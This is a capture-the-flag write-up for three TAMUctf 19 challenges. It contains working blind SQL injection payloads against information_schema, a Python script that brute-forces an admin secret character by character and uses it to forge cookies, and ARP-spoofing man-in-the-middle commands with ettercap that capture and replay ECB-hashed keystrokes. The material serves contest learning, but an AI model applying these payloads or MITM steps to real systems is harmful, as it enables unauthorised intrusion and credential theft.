TAMUctf 19
Web
Bird Box Challenge
bookgin
This is a blind SQL injection challenge.
curl "http://web2.tamuctf.com/Search.php?Search='%20or%20''='" -sD -
curl "http://web2.tamuctf.com/Search.php?Search='" -sD -
curl "http://web2.tamuctf.com/Search.php?Search=1" -sD -
- SQL syntax error: HTTP 200
- true: HTTP 500 + Nice try, nothing to see here.
- false: HTTP 500 + Our search isn't THAT good...
The HTTP status code is manipulated intentionally.
My payload to retrive all the information:
' or (select (select column_name from ((select table_schema,table_name,column_name FROM information_schema.columns where table_schema!='mysql' and table_schema!='information_schema' and table_schema !='sys' and table_schema !='performance_schema') as foo)) like binary "items" ) and ''='
- version:
5.7.25-0ubuntu0.18.04.2
- Database: sqlidb
- Table: Search
- Columns: items
- Rows:
Aggies
,Trucks
, andEggs
So where is the flag? Hmm... it takes me a few hours to realize that it's hided in the user()
....
gigem{w3_4r3_th3_4ggi3s}@localhost
1337 Secur1ty
bookgin, KennyTseng
Yey another SQL injnection challenge.
http://web6.tamuctf.com/message?id=' or ''='
To get the table names and column names first:
' or (select (select table_name from ((select table_schema,table_name,column_name FROM information_schema.columns where table_schema!='mysql' and table_schema!='information_schema' and table_schema !='sys' and table_schema !='performance_schema' and table_name != 'Messages' and table_name != 'Users') as foo) limit 1) like "foo%" ) and ''='
My script to retrieve admin's secret:
#!/usr/bin/env python3
import requests
s = requests.session()
cookies = dict(userid='3', secret='6IY7TNFKAVT5FNGK')
t = ''
while True:
for i in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-.':
print(t)
payload = f'''
' or
(select (select secret from Users where username = "1337-admin") like "{t+i}%")
and ''='
'''.replace('\n', '')
r = s.get('http://web6.tamuctf.com/message', params=dict(id=payload), cookies=cookies)
if 'we need to talk about the cookies' in r.text:
print(True)
t+=i
print(t)
break
elif '//' in r.text:
print(False)
else:
print('syntax error')
$ curl 'http://web6.tamuctf.com/' --cookie 'userid=1; secret=WIFHXDZ3BOHJMJSC'
# gigem{th3_T0tp_1s_we4k_w1tH_yoU}
Failed Attempts
- XSS: No it's not. The message body escapes the html properly.
- SQL injection in registering, editing information, cookies
Network/Pentest
Copper
After connect VPN by sudo openvpn --config copper.ovpn
, I scan the open subnet by nmap -privileged -v 172.30.0.0/28
.
172.30.0.2
8080/tcp open http-proxy
172.30.0.3
Then, I use the commands below to catch and format the bridged packets.
$ ettercap -T -t tcp -M arp:remote /172.30.0.2// /172.30.0.3// -L Sam
$ etterlog -n -s Sam.ecp -F tcp:172.30.0.3:33230:172.30.0.2:6023 >Sam.log.noheader
Just a peek over Sam.log.noheader
YiqMxpZQz+5dPf+qELowBw==
US5MJOeTx6L69iQT3Y8B9g==
83jbJmmZc/RUXML8GcGuVg==
h8zZvECdaFr730Mgo5EgYQ==
YiqMxpZQz+5dPf+qELowBw==
RdGNIA97r2yYuQsdXjbQGA==
S+79/0xJH6oVAqvGSE+Vlw==
Since the problem describe that the user typed the same commands below over and over, I guess they have something to do with the packet captured.
ls -la
date > monitor.txt
echo "=========================================" >> monitor.txt
echo "ps -aux" >> monitor.txt
ps -aux >> monitor.txt
echo "=========================================" >> monitor.txt
echo "df -h" >> monitor.txt
df -h >> monitor.txt
cp ./monitor.txt /logs
exit
Suprisingly, that's true.
YiqMxpZQz+5dPf+qELowBw== l
US5MJOeTx6L69iQT3Y8B9g== s
83jbJmmZc/RUXML8GcGuVg== ' '
h8zZvECdaFr730Mgo5EgYQ== -
YiqMxpZQz+5dPf+qELowBw== l
RdGNIA97r2yYuQsdXjbQGA== a
S+79/0xJH6oVAqvGSE+Vlw== <enter>
...
Therefore, I construct a mapping from character to HASH. Besides, we can view the content of monitor.txt
on http://172.30.0.2:8080/monitor.txt
.
Finally, our payload to get the flag before translated would be
# Send the hash(payload) to 172.30.0.3:6023
$ cat flag.txt > /logs/h
# If success, we will get response below.
# 92fKIeYPq2HyqG8DSo2Mfw==
Then
$ curl "http://172.30.0.2:8080/h"
# gigem{43s_3cb_b4d_a5c452ed22aa5f1a}